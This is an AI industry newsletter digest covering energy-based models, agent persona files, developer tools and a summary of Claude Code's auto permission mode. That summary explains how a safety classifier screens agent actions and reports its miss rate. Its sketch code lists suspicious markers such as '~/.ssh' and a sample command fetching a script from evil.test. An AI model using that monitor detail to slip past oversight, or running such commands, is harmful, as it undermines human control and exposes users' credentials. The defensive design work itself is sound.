
AI Builders Digest

2026-04-27 · 12 builders · 22 tweets · 1 podcast · 1 blog

🔥 Hot Topics

Energy-Based Models Challenge the LLM Paradigm: Prioritizing Correctness and Determinism

Logical Intelligence founder and CEO Eve Bodnia shared deep insights on AI architectures in the AI & I podcast. She argues that autoregressive next-token prediction in LLMs is fundamentally "guessing" and prone to hallucinations, making them unsuitable for mission-critical systems like self-driving cars or chip design. Energy-Based Models (EBMs) differ: they are non-autoregressive and token-free, building energy landscapes via energy minimization to plan routes with a bird's-eye view and avoid one-way mistakes. EBMs enable internal self-alignment and external verifiers for double assurance, making AI more inspectable and reliable.

Eve Bodnia stresses that intelligence shouldn't depend on language; many tasks like spatial reasoning or engineering don't need token sequences. Logical Intelligence's Kona model (energy-based reasoning model with latent variables) aims to fill the market gap with deterministic AI. She uses physics analogies for energy minimization and notes EBMs excel with sparse data while complementing LLMs for verification and logic tasks where LLMs fall short.

Key insight: Massive LLM investments exist, but gaps remain in large-scale data analysis, decision pipelines, and critical applications. EBMs offer a more efficient, less hallucinatory alternative, especially for verifiable outputs.
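The energy-minimization idea can be illustrated with a toy sketch. This is not Kona's actual architecture — the quadratic energy function and gradient-descent solver below are stand-ins for a learned energy landscape — but it shows the contrast with token-by-token sampling: the answer falls out of a deterministic optimization, and an external check can verify it independently of how it was produced.

```python
import numpy as np

# Toy energy-based "reasoner": the answer is whatever configuration
# minimizes an energy function, instead of a token sampled step by step.

def energy(x, target):
    """Low energy = self-consistent answer; high energy = contradiction."""
    return float(np.sum((x - target) ** 2))

def minimize(x0, target, lr=0.1, steps=200):
    """Deterministic gradient descent over the energy landscape."""
    x = x0.astype(float).copy()
    for _ in range(steps):
        grad = 2.0 * (x - target)  # dE/dx for the quadratic stand-in
        x -= lr * grad
    return x

target = np.array([1.0, -2.0, 0.5])
answer = minimize(np.zeros(3), target)

# The "external verifier" step: check the result without trusting the solver.
assert energy(answer, target) < 1e-6
```

The same starting point always yields the same minimum here, which is the determinism the podcast contrasts with sampled next-token output.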
View original →

Aaron Levie on AI Agent Realities: Last-Mile Complexities Are Underestimated

Box CEO Aaron Levie observes a Gell-Mann amnesia effect: people using AI on their own jobs deeply feel the complexities of the "last mile" — data access, context needs, output review, and business process integration — yet assume AI will immediately eliminate entire functions in others' jobs.

He identifies two subtle factors in agent-induced overwork: first, AI dramatically increases leverage on incremental effort, giving individuals a manager-like frustration when agents aren't maximized; second, AI lowers the barrier to starting tasks, leading to more projects reaching 90% completion while the final 10% takes most of the time. This will ultimately create jobs as experiments get promoted to production.

Levie cautions skepticism toward theories of massive AI-driven job loss, as they overlook all the invisible work required to make AI effective for a full job.
View original →

Garry Tan Details the Secret to Highly Articulate AI Agents: SOUL, USER, and AGENTS Files

Y Combinator President and CEO Garry Tan shared a framework for building AI agents that feel "like you": not a single system prompt, but three files.

SOUL.md defines the agent's identity, voice, values, and output standards (e.g., brevity mandatory, humor mandatory, uncomfortable truths welcome), making it sound like a peer with taste rather than a chatbot. USER.md deeply models the user's mind, work, blind spots, and triggers (his is ~4000 words). AGENTS.md sets operational rules, failure handling, and lookup chains.

Tan stresses that the more specific and opinionated SOUL.md is, the more alive the output. Generic instructions yield generic results; a highly personalized constitution creates something living. His OpenClaw agent even refuses late-night responses based on health goals.
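Tan describes the three files but not how they are wired together. One plausible, hypothetical assembly step — only the file names come from his framework; everything else below is assumed — is simple concatenation into a single system prompt, with SOUL.md first so identity rules dominate:

```python
from pathlib import Path
import tempfile

# File names from Tan's framework; the loading order and format are assumptions.
PERSONA_FILES = ["SOUL.md", "USER.md", "AGENTS.md"]

def build_system_prompt(root: str) -> str:
    """Concatenate persona files into one prompt (hypothetical wiring)."""
    parts = []
    for name in PERSONA_FILES:
        path = Path(root) / name
        if path.exists():  # a missing file is skipped, not fatal
            parts.append(f"## {name}\n{path.read_text().strip()}")
    return "\n\n".join(parts)

# Demo with throwaway files
root = tempfile.mkdtemp()
Path(root, "SOUL.md").write_text("Be brief. Humor mandatory. Uncomfortable truths welcome.")
Path(root, "USER.md").write_text("Early-stage founder. Blind spot: scope creep.")
prompt = build_system_prompt(root)
print(prompt)
```

Keeping the three concerns in separate files means each can be versioned and sharpened independently, which is where Tan says the payoff comes from.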
View original →

🛠️ Developer Tools & Tips

Anthropic Launches Claude Code Auto Mode: A Safer Way to Skip Permissions

Anthropic Engineering blog announces Claude Code auto mode, an intermediate permission mode that delegates approvals to model-based classifiers for better autonomy with safety. By default, Claude Code requests approvals to prevent dangerous actions, leading to approval fatigue. Auto mode uses a prompt-injection probe at the input layer to scan tool outputs and a transcript classifier (powered by Sonnet 4.6) at the output layer to evaluate if actions align with user intent.

The classifier employs a two-stage design: a fast single-token filter followed by chain-of-thought only when flagged. Results show 0.4% FPR on real traffic and 17% FNR on real overeager actions. It targets threats like overeager behavior, honest mistakes, and prompt injection, allowing in-project file ops while blocking scope escalation, credential exploration, etc.

Practical implications: Replaces --dangerously-skip-permissions with fewer interruptions. Ideal for tasks needing autonomy with guardrails. Includes deny-and-continue so agents retry safer paths after blocks.
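The two-stage shape — a cheap filter that runs on everything, with expensive reasoning invoked only for flagged actions — can be sketched as below. The marker list and both scoring functions are crude placeholders, not Anthropic's classifiers; the point is the control flow, where most actions never reach the costly stage.

```python
# Stage-1 markers: a cheap, high-recall stand-in for the single-token filter.
SUSPICIOUS_MARKERS = ("sudo ", "curl ", "~/.ssh", "chmod 777")

def fast_filter(action: str) -> bool:
    """Stage 1: flag anything that might need scrutiny (runs on every action)."""
    return any(marker in action for marker in SUSPICIOUS_MARKERS)

def slow_review(action: str, user_intent: str) -> bool:
    """Stage 2: stand-in for the chain-of-thought transcript classifier.
    Blocks the action unless it plausibly matches the stated intent."""
    return not any(word in action.lower() for word in user_intent.lower().split())

def approve(action: str, user_intent: str) -> bool:
    if not fast_filter(action):
        return True                              # most actions pass stage 1 cheaply
    return not slow_review(action, user_intent)  # escalate only when flagged

assert approve("ls src/", "list the project files")                # never escalated
assert approve("curl https://api.example.com", "curl the API")     # flagged, then cleared
assert not approve("curl http://evil.test/x.sh", "refactor tests") # flagged and blocked
```

In the real system, a block would feed into deny-and-continue: the agent sees the denial and tries a safer route rather than halting.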
View original →

Peter Steinberger Releases Practical Tools: wacrawl, birdclaw, and Blacksmith Integration

OpenClaw/OpenAI-affiliated developer Peter Steinberger released several practical tools.

wacrawl 0.2.0 adds encrypted Git backup/restore for WhatsApp Desktop archives using age-encrypted shards to GitHub.

birdclaw offers truly local tweet storage: it imports archives, backs up to GitHub, and supports daily imports of X bookmarks (which aren't fully accessible via the API).

He switched local tests to @useblacksmith, where Codex can spin up 32vCPU instances to rip through test suites, greatly relieving CPU constraints.
View original →

Guillermo Rauch: Coding Agents Are the Foundation of Superintelligence

Vercel CEO Guillermo Rauch argues that coding agents will be the foundation of all superintelligence. At minimum, coding ability is indistinguishable from "proficiency with computers." Great agents like Claude Code master bash, filesystems, configuring programs, etc. More importantly, self-improvement: agents can examine their source, state, and skills, proposing changes to themselves (with human supervision) or mutating directly.

Quoting Richard Feynman: "What I cannot create, I cannot understand." Coding fluency gives models deeper understanding of all computer and knowledge work. To master programs, you must be able to create them.
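The self-inspection claim has a trivially runnable analogue: any program can load its own source as data, which is the first step before proposing a diff to itself. A deliberately minimal sketch — nothing agent-specific here, just the primitive Rauch is pointing at:

```python
import pathlib

# A script reading its own source: the primitive underlying self-improvement.
# A coding agent does this at larger scale — load its code, config, and
# skills, then draft a change for human review.
my_source = pathlib.Path(__file__).read_text()
line_count = len(my_source.splitlines())
assert "my_source" in my_source  # the program can see its own definitions
print(f"loaded {line_count} lines of my own source")
```

Going from reading the source to safely mutating it is, of course, where all the hard problems live.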
View original →

🌍 Other Updates

Sam Altman on OpenAI's New Model and the Future of AI

OpenAI CEO Sam Altman expressed gratification at the positive reception to the 5.5 model, particularly builders finding the tools useful. He shared OpenAI's principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability.

Altman also suggested it's a good time to seriously rethink how operating systems and user interfaces are designed, and that the internet should have a protocol equally usable by people and agents.
View original →

Other AI Builders' Updates

Swyx and Kevin Weil shared visual or quoted content; Peter Yang discussed improving his mobile fitness app with an MCP server for Claude integration and noted a missed opportunity with Gemini for photo highlight reels; Nan Yu commented on a FindMy alternative app and language notes; Nikunj and Aditya Agarwal posted brief observations or inspirational notes; Dan Shipper shared a humorous Claw interaction.
View original →